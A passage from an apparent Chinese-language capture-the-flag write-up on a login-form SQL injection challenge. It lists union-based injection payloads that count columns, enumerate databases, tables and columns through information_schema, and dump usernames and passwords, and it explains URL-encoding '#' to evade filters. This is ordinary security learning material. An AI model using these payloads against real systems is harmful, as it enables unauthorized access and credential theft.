?username=1' order by 3%23&password=111 ?username=1' order by 4%23&password=111 当by 4的时候报错显示字段长度不对,所以有3个字段 %23是#通过url编码后的,有的地方设置了界限,比如说遇到#这个字符就会报错或者转换成别的,我们用url编码的目的就是用相同的意思而不被发现从而绕过规定的限制。
3.查找数据库
1
?username=1' union select 1,2,group_concat(schema_name)from information_schema.schemata%23&password=111
?username=1' union select 1,2,group_concat(table_name)from information_schema.tables where table_schema='geek'%23&password=111 或者下面的,因为它有两个数据库 ?username=1' union select 1,2,group_concat(table_name)from information_schema.tables where table_schema='test'%23&password=111
有两个数据库 geek和test,所以我们都要试一下,可以看到在geek中有两个数据表
5.查看数据结构
1 2 3
?username=1' union select 1,2,group_concat(column_name)from information_schema.columns where table_name='geekuser'%23&password=11 或者 ?username=1' union select 1,2,group_concat(column_name)from information_schema.columns where table_name='l0ve1ysq1'%23&password=111
l0ve1ysq1才有有效的东西
6.查看数据结构里内容
1
?username=1' union select 1,2,group_concat(id,username,password)from l0ve1ysq1%23&password=111